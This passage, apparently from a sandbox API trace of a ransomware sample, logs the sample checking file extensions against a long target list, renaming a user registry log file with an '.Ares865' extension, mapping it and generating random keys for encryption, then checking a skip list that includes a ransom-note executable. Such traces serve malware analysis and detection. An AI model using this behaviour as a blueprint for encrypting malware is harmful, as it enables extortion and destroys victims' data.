returned 3 [0057.530] lstrcmpiW (lpString1="OG1", lpString2="rar") returned -1 [0057.530] lstrlenW (lpString="zip") returned 3 [0057.530] lstrcmpiW (lpString1="OG1", lpString2="zip") returned -1 [0057.530] lstrlenW (lpString="tgz") returned 3 [0057.530] lstrcmpiW (lpString1="OG1", lpString2="tgz") returned -1 [0057.530] lstrlenW (lpString="vbox") returned 4 [0057.530] lstrcmpiW (lpString1="LOG1", lpString2="vbox") returned -1 [0057.530] lstrlenW (lpString="vdi") returned 3 [0057.530] lstrcmpiW (lpString1="OG1", lpString2="vdi") returned -1 [0057.531] lstrlenW (lpString="vhd") returned 3 [0057.531] lstrcmpiW (lpString1="OG1", lpString2="vhd") returned -1 [0057.531] lstrlenW (lpString="vhdx") returned 4 [0057.531] lstrcmpiW (lpString1="LOG1", lpString2="vhdx") returned -1 [0057.531] lstrlenW (lpString="avhd") returned 4 [0057.531] lstrcmpiW (lpString1="LOG1", lpString2="avhd") returned 1 [0057.531] lstrlenW (lpString="db") returned 2 [0057.531] lstrcmpiW (lpString1="G1", lpString2="db") returned 1 [0057.531] lstrlenW (lpString="db2") returned 3 [0057.531] lstrcmpiW (lpString1="OG1", lpString2="db2") returned 1 [0057.531] lstrlenW (lpString="db3") returned 3 [0057.531] lstrcmpiW (lpString1="OG1", lpString2="db3") returned 1 [0057.531] lstrlenW (lpString="dbf") returned 3 [0057.531] lstrcmpiW (lpString1="OG1", lpString2="dbf") returned 1 [0057.531] lstrlenW (lpString="mdf") returned 3 [0057.531] lstrcmpiW (lpString1="OG1", lpString2="mdf") returned 1 [0057.531] lstrlenW (lpString="mdb") returned 3 [0057.531] lstrcmpiW (lpString1="OG1", lpString2="mdb") returned 1 [0057.531] lstrlenW (lpString="sql") returned 3 [0057.531] lstrcmpiW (lpString1="OG1", lpString2="sql") returned -1 [0057.531] lstrlenW (lpString="sqlite") returned 6 [0057.531] lstrcmpiW (lpString1="T.LOG1", lpString2="sqlite") returned 1 [0057.531] lstrlenW (lpString="sqlite3") returned 7 [0057.531] lstrcmpiW (lpString1="AT.LOG1", lpString2="sqlite3") returned -1 [0057.531] lstrlenW (lpString="sqlitedb") returned 8 [0057.531] lstrcmpiW (lpString1="DAT.LOG1", lpString2="sqlitedb") returned -1 [0057.531] lstrlenW (lpString="xml") returned 3 [0057.531] lstrcmpiW (lpString1="OG1", lpString2="xml") returned -1 [0057.531] lstrlenW (lpString="$er") returned 3 [0057.531] lstrcmpiW (lpString1="OG1", lpString2="$er") returned 1 [0057.531] lstrlenW (lpString="4dd") returned 3 [0057.531] lstrcmpiW (lpString1="OG1", lpString2="4dd") returned 1 [0057.531] lstrlenW (lpString="4dl") returned 3 [0057.531] lstrcmpiW (lpString1="OG1", lpString2="4dl") returned 1 [0057.531] lstrlenW (lpString="^^^") returned 3 [0057.531] lstrcmpiW (lpString1="OG1", lpString2="^^^") returned 1 [0057.531] lstrlenW (lpString="abs") returned 3 [0057.532] lstrcmpiW (lpString1="OG1", lpString2="abs") returned 1 [0057.532] lstrlenW (lpString="abx") returned 3 [0057.532] lstrcmpiW (lpString1="OG1", lpString2="abx") returned 1 [0057.532] lstrlenW (lpString="accdb") returned 5 [0057.532] lstrcmpiW (lpString1=".LOG1", lpString2="accdb") returned -1 [0057.532] lstrlenW (lpString="accdc") returned 5 [0057.532] lstrcmpiW (lpString1=".LOG1", lpString2="accdc") returned -1 [0057.532] lstrlenW (lpString="accde") returned 5 [0057.532] lstrcmpiW (lpString1=".LOG1", lpString2="accde") returned -1 [0057.532] lstrlenW (lpString="accdr") returned 5 [0057.532] lstrcmpiW (lpString1=".LOG1", lpString2="accdr") returned -1 [0057.532] lstrlenW (lpString="accdt") returned 5 [0057.532] lstrcmpiW (lpString1=".LOG1", lpString2="accdt") returned -1 [0057.532] lstrlenW (lpString="accdw") returned 5 [0057.532] lstrcmpiW (lpString1=".LOG1", lpString2="accdw") returned -1 [0057.532] lstrlenW (lpString="accft") returned 5 [0057.532] lstrcmpiW (lpString1=".LOG1", lpString2="accft") returned -1 [0057.532] lstrlenW (lpString="adb") returned 3 [0057.532] lstrcmpiW (lpString1="OG1", lpString2="adb") returned 1 [0057.532] lstrlenW (lpString="adb") returned 3 [0057.532] lstrcmpiW (lpString1="OG1", lpString2="adb") returned 1 [0057.532] lstrlenW (lpString="ade") returned 3 [0057.532] lstrcmpiW (lpString1="OG1", lpString2="ade") returned 1 [0057.532] lstrlenW (lpString="adf") returned 3 [0057.532] lstrcmpiW (lpString1="OG1", lpString2="adf") returned 1 [0057.532] lstrlenW (lpString="adn") returned 3 [0057.532] lstrcmpiW (lpString1="OG1", lpString2="adn") returned 1 [0057.532] lstrlenW (lpString="adp") returned 3 [0057.532] lstrcmpiW (lpString1="OG1", lpString2="adp") returned 1 [0057.532] lstrlenW (lpString="alf") returned 3 [0057.532] lstrcmpiW (lpString1="OG1", lpString2="alf") returned 1 [0057.532] lstrlenW (lpString="ask") returned 3 [0057.532] lstrcmpiW (lpString1="OG1", lpString2="ask") returned 1 [0057.532] lstrlenW (lpString="btr") returned 3 [0057.532] lstrcmpiW (lpString1="OG1", lpString2="btr") returned 1 [0057.532] lstrlenW (lpString="cat") returned 3 [0057.532] lstrcmpiW (lpString1="OG1", lpString2="cat") returned 1 [0057.532] lstrlenW (lpString="cdb") returned 3 [0057.533] lstrcmpiW (lpString1="OG1", lpString2="cdb") returned 1 [0057.533] lstrlenW (lpString="ckp") returned 3 [0057.533] lstrcmpiW (lpString1="OG1", lpString2="ckp") returned 1 [0057.533] lstrlenW (lpString="cma") returned 3 [0057.533] lstrcmpiW (lpString1="OG1", lpString2="cma") returned 1 [0057.533] lstrlenW (lpString="cpd") returned 3 [0057.533] lstrcmpiW (lpString1="OG1", lpString2="cpd") returned 1 [0057.533] lstrlenW (lpString="dacpac") returned 6 [0057.533] lstrcmpiW (lpString1="T.LOG1", lpString2="dacpac") returned 1 [0057.533] lstrlenW (lpString="dad") returned 3 [0057.533] lstrcmpiW (lpString1="OG1", lpString2="dad") returned 1 [0057.533] lstrlenW (lpString="dadiagrams") returned 10 [0057.533] lstrcmpiW (lpString1="R.DAT.LOG1", lpString2="dadiagrams") returned 1 [0057.533] lstrlenW (lpString="daschema") returned 8 [0057.533] lstrcmpiW (lpString1="DAT.LOG1", lpString2="daschema") returned 1 [0057.533] lstrlenW (lpString="db-journal") returned 10 [0057.533] lstrcmpiW (lpString1="R.DAT.LOG1", lpString2="db-journal") returned 1 [0057.533] lstrlenW (lpString="db-shm") returned 6 [0057.533] lstrcmpiW (lpString1="T.LOG1", lpString2="db-shm") returned 1 [0057.533] lstrlenW (lpString="db-wal") returned 6 [0057.533] lstrcmpiW (lpString1="T.LOG1", lpString2="db-wal") returned 1 [0057.533] lstrlenW (lpString="dbc") returned 3 [0057.533] lstrcmpiW (lpString1="OG1", lpString2="dbc") returned 1 [0057.533] lstrlenW (lpString="dbs") returned 3 [0057.533] lstrcmpiW (lpString1="OG1", lpString2="dbs") returned 1 [0057.533] lstrlenW (lpString="dbt") returned 3 [0057.533] lstrcmpiW (lpString1="OG1", lpString2="dbt") returned 1 [0057.533] lstrlenW (lpString="dbv") returned 3 [0057.533] lstrcmpiW (lpString1="OG1", lpString2="dbv") returned 1 [0057.533] lstrlenW (lpString="dbx") returned 3 [0057.533] lstrcmpiW (lpString1="OG1", lpString2="dbx") returned 1 [0057.533] lstrlenW (lpString="dcb") returned 3 [0057.533] lstrcmpiW (lpString1="OG1", lpString2="dcb") returned 1 [0057.533] lstrlenW (lpString="dct") returned 3 [0057.533] lstrcmpiW (lpString1="OG1", lpString2="dct") returned 1 [0057.533] lstrlenW (lpString="dcx") returned 3 [0057.533] lstrcmpiW (lpString1="OG1", lpString2="dcx") returned 1 [0057.533] lstrlenW (lpString="ddl") returned 3 [0057.534] lstrcmpiW (lpString1="OG1", lpString2="ddl") returned 1 [0057.534] lstrlenW (lpString="dlis") returned 4 [0057.534] lstrcmpiW (lpString1="LOG1", lpString2="dlis") returned 1 [0057.534] lstrlenW (lpString="dp1") returned 3 [0057.534] lstrcmpiW (lpString1="OG1", lpString2="dp1") returned 1 [0057.534] lstrlenW (lpString="dqy") returned 3 [0057.534] lstrcmpiW (lpString1="OG1", lpString2="dqy") returned 1 [0057.534] lstrlenW (lpString="dsk") returned 3 [0057.534] lstrcmpiW (lpString1="OG1", lpString2="dsk") returned 1 [0057.534] lstrlenW (lpString="dsn") returned 3 [0057.534] lstrcmpiW (lpString1="OG1", lpString2="dsn") returned 1 [0057.534] lstrlenW (lpString="dtsx") returned 4 [0057.534] lstrcmpiW (lpString1="LOG1", lpString2="dtsx") returned 1 [0057.534] lstrlenW (lpString="dxl") returned 3 [0057.534] lstrcmpiW (lpString1="OG1", lpString2="dxl") returned 1 [0057.534] lstrlenW (lpString="eco") returned 3 [0057.534] lstrcmpiW (lpString1="OG1", lpString2="eco") returned 1 [0057.534] lstrlenW (lpString="ecx") returned 3 [0057.534] lstrcmpiW (lpString1="OG1", lpString2="ecx") returned 1 [0057.534] lstrlenW (lpString="edb") returned 3 [0057.534] lstrcmpiW (lpString1="OG1", lpString2="edb") returned 1 [0057.534] lstrlenW (lpString="epim") returned 4 [0057.534] lstrcmpiW (lpString1="LOG1", lpString2="epim") returned 1 [0057.534] lstrlenW (lpString="fcd") returned 3 [0057.534] lstrcmpiW (lpString1="OG1", lpString2="fcd") returned 1 [0057.534] lstrlenW (lpString="fdb") returned 3 [0057.534] lstrcmpiW (lpString1="OG1", lpString2="fdb") returned 1 [0057.534] lstrlenW (lpString="fic") returned 3 [0057.534] lstrcmpiW (lpString1="OG1", lpString2="fic") returned 1 [0057.534] lstrlenW (lpString="flexolibrary") returned 12 [0057.534] lstrcmpiW (lpString1="SER.DAT.LOG1", lpString2="flexolibrary") returned 1 [0057.534] lstrlenW (lpString="fm5") returned 3 [0057.534] lstrcmpiW (lpString1="OG1", lpString2="fm5") returned 1 [0057.534] lstrlenW (lpString="fmp") returned 3 [0057.534] lstrcmpiW (lpString1="OG1", lpString2="fmp") returned 1 [0057.534] lstrlenW (lpString="fmp12") returned 5 [0057.535] lstrcmpiW (lpString1=".LOG1", lpString2="fmp12") returned -1 [0057.535] lstrlenW (lpString="fmpsl") returned 5 [0057.535] lstrcmpiW (lpString1=".LOG1", lpString2="fmpsl") returned -1 [0057.535] lstrlenW (lpString="fol") returned 3 [0057.535] lstrcmpiW (lpString1="OG1", lpString2="fol") returned 1 [0057.535] lstrlenW (lpString="fp3") returned 3 [0057.535] lstrcmpiW (lpString1="OG1", lpString2="fp3") returned 1 [0057.535] lstrlenW (lpString="fp4") returned 3 [0057.535] lstrcmpiW (lpString1="OG1", lpString2="fp4") returned 1 [0057.535] lstrlenW (lpString="fp5") returned 3 [0057.535] lstrcmpiW (lpString1="OG1", lpString2="fp5") returned 1 [0057.535] lstrlenW (lpString="fp7") returned 3 [0057.535] lstrcmpiW (lpString1="OG1", lpString2="fp7") returned 1 [0057.535] lstrlenW (lpString="fpt") returned 3 [0057.535] lstrcmpiW (lpString1="OG1", lpString2="fpt") returned 1 [0057.535] lstrlenW (lpString="frm") returned 3 [0057.535] lstrcmpiW (lpString1="OG1", lpString2="frm") returned 1 [0057.535] lstrlenW (lpString="gdb") returned 3 [0057.535] lstrcmpiW (lpString1="OG1", lpString2="gdb") returned 1 [0057.535] lstrlenW (lpString="gdb") returned 3 [0057.535] lstrcmpiW (lpString1="OG1", lpString2="gdb") returned 1 [0057.535] lstrlenW (lpString="grdb") returned 4 [0057.535] lstrcmpiW (lpString1="LOG1", lpString2="grdb") returned 1 [0057.535] lstrlenW (lpString="gwi") returned 3 [0057.535] lstrcmpiW (lpString1="OG1", lpString2="gwi") returned 1 [0057.535] lstrlenW (lpString="hdb") returned 3 [0057.535] lstrcmpiW (lpString1="OG1", lpString2="hdb") returned 1 [0057.535] lstrlenW (lpString="his") returned 3 [0057.535] lstrcmpiW (lpString1="OG1", lpString2="his") returned 1 [0057.535] lstrlenW (lpString="ib") returned 2 [0057.535] lstrcmpiW (lpString1="G1", lpString2="ib") returned -1 [0057.535] lstrlenW (lpString="idb") returned 3 [0057.535] lstrcmpiW (lpString1="OG1", lpString2="idb") returned 1 [0057.535] lstrlenW (lpString="ihx") returned 3 [0057.535] lstrcmpiW (lpString1="OG1", lpString2="ihx") returned 1 [0057.535] lstrlenW (lpString="itdb") returned 4 [0057.536] lstrcmpiW (lpString1="LOG1", lpString2="itdb") returned 1 [0057.536] lstrlenW (lpString="itw") returned 3 [0057.536] lstrcmpiW (lpString1="OG1", lpString2="itw") returned 1 [0057.536] lstrlenW (lpString="jet") returned 3 [0057.536] lstrcmpiW (lpString1="OG1", lpString2="jet") returned 1 [0057.536] lstrlenW (lpString="jtx") returned 3 [0057.536] lstrcmpiW (lpString1="OG1", lpString2="jtx") returned 1 [0057.536] lstrlenW (lpString="kdb") returned 3 [0057.536] lstrcmpiW (lpString1="OG1", lpString2="kdb") returned 1 [0057.536] lstrlenW (lpString="kexi") returned 4 [0057.536] lstrcmpiW (lpString1="LOG1", lpString2="kexi") returned 1 [0057.536] lstrlenW (lpString="kexic") returned 5 [0057.536] lstrcmpiW (lpString1=".LOG1", lpString2="kexic") returned -1 [0057.536] lstrlenW (lpString="kexis") returned 5 [0057.536] lstrcmpiW (lpString1=".LOG1", lpString2="kexis") returned -1 [0057.536] lstrlenW (lpString="lgc") returned 3 [0057.536] lstrcmpiW (lpString1="OG1", lpString2="lgc") returned 1 [0057.536] lstrlenW (lpString="lwx") returned 3 [0057.536] lstrcmpiW (lpString1="OG1", lpString2="lwx") returned 1 [0057.536] lstrlenW (lpString="maf") returned 3 [0057.536] lstrcmpiW (lpString1="OG1", lpString2="maf") returned 1 [0057.536] lstrlenW (lpString="maq") returned 3 [0057.536] lstrcmpiW (lpString1="OG1", lpString2="maq") returned 1 [0057.536] lstrlenW (lpString="mar") returned 3 [0057.536] lstrcmpiW (lpString1="OG1", lpString2="mar") returned 1 [0057.536] lstrlenW (lpString="marshal") returned 7 [0057.536] lstrcmpiW (lpString1="AT.LOG1", lpString2="marshal") returned -1 [0057.536] lstrlenW (lpString="mas") returned 3 [0057.536] lstrcmpiW (lpString1="OG1", lpString2="mas") returned 1 [0057.536] lstrlenW (lpString="mav") returned 3 [0057.536] lstrcmpiW (lpString1="OG1", lpString2="mav") returned 1 [0057.536] lstrlenW (lpString="maw") returned 3 [0057.536] lstrcmpiW (lpString1="OG1", lpString2="maw") returned 1 [0057.536] lstrlenW (lpString="mdbhtml") returned 7 [0057.536] lstrcmpiW (lpString1="AT.LOG1", lpString2="mdbhtml") returned -1 [0057.536] lstrlenW (lpString="mdn") returned 3 [0057.536] lstrcmpiW (lpString1="OG1", lpString2="mdn") returned 1 [0057.537] lstrlenW (lpString="mdt") returned 3 [0057.537] lstrcmpiW (lpString1="OG1", lpString2="mdt") returned 1 [0057.537] lstrlenW (lpString="mfd") returned 3 [0057.537] lstrcmpiW (lpString1="OG1", lpString2="mfd") returned 1 [0057.537] lstrlenW (lpString="mpd") returned 3 [0057.537] lstrcmpiW (lpString1="OG1", lpString2="mpd") returned 1 [0057.537] lstrlenW (lpString="mrg") returned 3 [0057.537] lstrcmpiW (lpString1="OG1", lpString2="mrg") returned 1 [0057.537] lstrlenW (lpString="mud") returned 3 [0057.537] lstrcmpiW (lpString1="OG1", lpString2="mud") returned 1 [0057.537] lstrlenW (lpString="mwb") returned 3 [0057.537] lstrcmpiW (lpString1="OG1", lpString2="mwb") returned 1 [0057.537] lstrlenW (lpString="myd") returned 3 [0057.537] lstrcmpiW (lpString1="OG1", lpString2="myd") returned 1 [0057.537] lstrlenW (lpString="ndf") returned 3 [0057.537] lstrcmpiW (lpString1="OG1", lpString2="ndf") returned 1 [0057.537] lstrlenW (lpString="nnt") returned 3 [0057.537] lstrcmpiW (lpString1="OG1", lpString2="nnt") returned 1 [0057.537] lstrlenW (lpString="nrmlib") returned 6 [0057.537] lstrcmpiW (lpString1="T.LOG1", lpString2="nrmlib") returned 1 [0057.537] lstrlenW (lpString="ns2") returned 3 [0057.537] lstrcmpiW (lpString1="OG1", lpString2="ns2") returned 1 [0057.537] lstrlenW (lpString="ns3") returned 3 [0057.537] lstrcmpiW (lpString1="OG1", lpString2="ns3") returned 1 [0057.537] lstrlenW (lpString="ns4") returned 3 [0057.537] lstrcmpiW (lpString1="OG1", lpString2="ns4") returned 1 [0057.537] lstrlenW (lpString="nsf") returned 3 [0057.537] lstrcmpiW (lpString1="OG1", lpString2="nsf") returned 1 [0057.537] lstrlenW (lpString="nv") returned 2 [0057.537] lstrcmpiW (lpString1="G1", lpString2="nv") returned -1 [0057.537] lstrlenW (lpString="nv2") returned 3 [0057.537] lstrcmpiW (lpString1="OG1", lpString2="nv2") returned 1 [0057.537] lstrlenW (lpString="nwdb") returned 4 [0057.537] lstrcmpiW (lpString1="LOG1", lpString2="nwdb") returned -1 [0057.537] lstrlenW (lpString="nyf") returned 3 [0057.537] lstrcmpiW (lpString1="OG1", lpString2="nyf") returned 1 [0057.537] lstrlenW (lpString="odb") returned 3 [0057.537] lstrcmpiW (lpString1="OG1", lpString2="odb") returned 1 [0057.538] lstrlenW (lpString="odb") returned 3 [0057.538] lstrcmpiW (lpString1="OG1", lpString2="odb") returned 1 [0057.538] lstrlenW (lpString="oqy") returned 3 [0057.538] lstrcmpiW (lpString1="OG1", lpString2="oqy") returned -1 [0057.538] lstrlenW (lpString="ora") returned 3 [0057.538] lstrcmpiW (lpString1="OG1", lpString2="ora") returned -1 [0057.538] lstrlenW (lpString="orx") returned 3 [0057.538] lstrcmpiW (lpString1="OG1", lpString2="orx") returned -1 [0057.538] lstrlenW (lpString="owc") returned 3 [0057.538] lstrcmpiW (lpString1="OG1", lpString2="owc") returned -1 [0057.538] lstrlenW (lpString="p96") returned 3 [0057.538] lstrcmpiW (lpString1="OG1", lpString2="p96") returned -1 [0057.538] lstrlenW (lpString="p97") returned 3 [0057.538] lstrcmpiW (lpString1="OG1", lpString2="p97") returned -1 [0057.538] lstrlenW (lpString="pan") returned 3 [0057.538] lstrcmpiW (lpString1="OG1", lpString2="pan") returned -1 [0057.538] lstrlenW (lpString="pdb") returned 3 [0057.538] lstrcmpiW (lpString1="OG1", lpString2="pdb") returned -1 [0057.538] lstrlenW (lpString="pdm") returned 3 [0057.538] lstrcmpiW (lpString1="OG1", lpString2="pdm") returned -1 [0057.538] lstrlenW (lpString="pnz") returned 3 [0057.538] lstrcmpiW (lpString1="OG1", lpString2="pnz") returned -1 [0057.538] lstrlenW (lpString="qry") returned 3 [0057.538] lstrcmpiW (lpString1="OG1", lpString2="qry") returned -1 [0057.538] lstrlenW (lpString="qvd") returned 3 [0057.538] lstrcmpiW (lpString1="OG1", lpString2="qvd") returned -1 [0057.538] lstrlenW (lpString="rbf") returned 3 [0057.538] lstrcmpiW (lpString1="OG1", lpString2="rbf") returned -1 [0057.538] lstrlenW (lpString="rctd") returned 4 [0057.538] lstrcmpiW (lpString1="LOG1", lpString2="rctd") returned -1 [0057.538] lstrlenW (lpString="rod") returned 3 [0057.538] lstrcmpiW (lpString1="OG1", lpString2="rod") returned -1 [0057.538] lstrlenW (lpString="rodx") returned 4 [0057.538] lstrcmpiW (lpString1="LOG1", lpString2="rodx") returned -1 [0057.538] lstrlenW (lpString="rpd") returned 3 [0057.538] lstrcmpiW (lpString1="OG1", lpString2="rpd") returned -1 [0057.539] lstrlenW (lpString="rsd") returned 3 [0057.539] lstrcmpiW (lpString1="OG1", lpString2="rsd") returned -1 [0057.539] lstrlenW (lpString="sas7bdat") returned 8 [0057.539] lstrcmpiW (lpString1="DAT.LOG1", lpString2="sas7bdat") returned -1 [0057.539] lstrlenW (lpString="sbf") returned 3 [0057.539] lstrcmpiW (lpString1="OG1", lpString2="sbf") returned -1 [0057.539] lstrlenW (lpString="scx") returned 3 [0057.539] lstrcmpiW (lpString1="OG1", lpString2="scx") returned -1 [0057.539] lstrlenW (lpString="sdb") returned 3 [0057.539] lstrcmpiW (lpString1="OG1", lpString2="sdb") returned -1 [0057.539] lstrlenW (lpString="sdc") returned 3 [0057.539] lstrcmpiW (lpString1="OG1", lpString2="sdc") returned -1 [0057.539] lstrlenW (lpString="sdf") returned 3 [0057.539] lstrcmpiW (lpString1="OG1", lpString2="sdf") returned -1 [0057.539] lstrlenW (lpString="sis") returned 3 [0057.539] lstrcmpiW (lpString1="OG1", lpString2="sis") returned -1 [0057.539] lstrlenW (lpString="spq") returned 3 [0057.539] lstrcmpiW (lpString1="OG1", lpString2="spq") returned -1 [0057.539] lstrlenW (lpString="te") returned 2 [0057.539] lstrcmpiW (lpString1="G1", lpString2="te") returned -1 [0057.539] lstrlenW (lpString="teacher") returned 7 [0057.539] lstrcmpiW (lpString1="AT.LOG1", lpString2="teacher") returned -1 [0057.539] lstrlenW (lpString="tmd") returned 3 [0057.539] lstrcmpiW (lpString1="OG1", lpString2="tmd") returned -1 [0057.539] lstrlenW (lpString="tps") returned 3 [0057.539] lstrcmpiW (lpString1="OG1", lpString2="tps") returned -1 [0057.539] lstrlenW (lpString="trc") returned 3 [0057.539] lstrcmpiW (lpString1="OG1", lpString2="trc") returned -1 [0057.539] lstrlenW (lpString="trc") returned 3 [0057.539] lstrcmpiW (lpString1="OG1", lpString2="trc") returned -1 [0057.539] lstrlenW (lpString="trm") returned 3 [0057.539] lstrcmpiW (lpString1="OG1", lpString2="trm") returned -1 [0057.539] lstrlenW (lpString="udb") returned 3 [0057.539] lstrcmpiW (lpString1="OG1", lpString2="udb") returned -1 [0057.539] lstrlenW (lpString="udl") returned 3 [0057.539] lstrcmpiW (lpString1="OG1", lpString2="udl") returned -1 [0057.539] lstrlenW (lpString="usr") returned 3 [0057.540] lstrcmpiW (lpString1="OG1", lpString2="usr") returned -1 [0057.540] lstrlenW (lpString="v12") returned 3 [0057.540] lstrcmpiW (lpString1="OG1", lpString2="v12") returned -1 [0057.540] lstrlenW (lpString="vis") returned 3 [0057.540] lstrcmpiW (lpString1="OG1", lpString2="vis") returned -1 [0057.540] lstrlenW (lpString="vpd") returned 3 [0057.540] lstrcmpiW (lpString1="OG1", lpString2="vpd") returned -1 [0057.540] lstrlenW (lpString="vvv") returned 3 [0057.540] lstrcmpiW (lpString1="OG1", lpString2="vvv") returned -1 [0057.540] lstrlenW (lpString="wdb") returned 3 [0057.540] lstrcmpiW (lpString1="OG1", lpString2="wdb") returned -1 [0057.540] lstrlenW (lpString="wmdb") returned 4 [0057.540] lstrcmpiW (lpString1="LOG1", lpString2="wmdb") returned -1 [0057.540] lstrlenW (lpString="wrk") returned 3 [0057.540] lstrcmpiW (lpString1="OG1", lpString2="wrk") returned -1 [0057.540] lstrlenW (lpString="xdb") returned 3 [0057.540] lstrcmpiW (lpString1="OG1", lpString2="xdb") returned -1 [0057.540] lstrlenW (lpString="xld") returned 3 [0057.540] lstrcmpiW (lpString1="OG1", lpString2="xld") returned -1 [0057.540] lstrlenW (lpString="xmlff") returned 5 [0057.540] lstrcmpiW (lpString1=".LOG1", lpString2="xmlff") returned -1 [0057.540] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\NTUSER.DAT.LOG1.Ares865") returned 45 [0057.540] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default user\\ntuser.dat.log1"), lpNewFileName="C:\\Users\\Default User\\NTUSER.DAT.LOG1.Ares865" (normalized: "c:\\users\\default user\\ntuser.dat.log1.ares865"), dwFlags=0x1) returned 1 [0057.541] CreateFileW (lpFileName="C:\\Users\\Default User\\NTUSER.DAT.LOG1.Ares865" (normalized: "c:\\users\\default user\\ntuser.dat.log1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0057.541] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=189440) returned 1 [0057.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0057.542] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0057.542] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0057.542] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0057.543] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0057.543] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0057.543] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2e700, lpName=0x0) returned 0x164 [0057.544] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2e700) returned 0x470000 [0057.555] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0057.555] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0057.555] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0057.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0057.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0057.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0057.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0057.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0057.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0057.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0057.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0057.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0057.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0057.556] UnmapViewOfFile (lpBaseAddress=0x470000) returned 1 [0057.558] CloseHandle (hObject=0x164) returned 1 [0057.558] CloseHandle (hObject=0x15c) returned 1 [0057.560] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0057.560] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0057.560] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0057.561] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9012aa61, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x9012aa61, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0057.561] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.561] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="aoldtz.exe") returned 1 [0057.561] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2=".") returned 1 [0057.561] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="..") returned 1 [0057.561] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="windows") returned -1 [0057.561] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="bootmgr") returned 1 [0057.561] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="temp") returned -1 [0057.562] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="pagefile.sys") returned -1 [0057.562] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="boot") returned 1 [0057.562] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="ids.txt") returned 1 [0057.562] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="ntuser.dat") returned 1 [0057.562] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="perflogs") returned -1 [0057.562] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="MSBuild") returned 1 [0057.562] lstrlenW (lpString="NTUSER.DAT.LOG2") returned 15 [0057.562] lstrlenW (lpString="C:\\Users\\Default User\\NTUSER.DAT.LOG1") returned 37 [0057.562] lstrcpyW (in: lpString1=0x2cce42c, 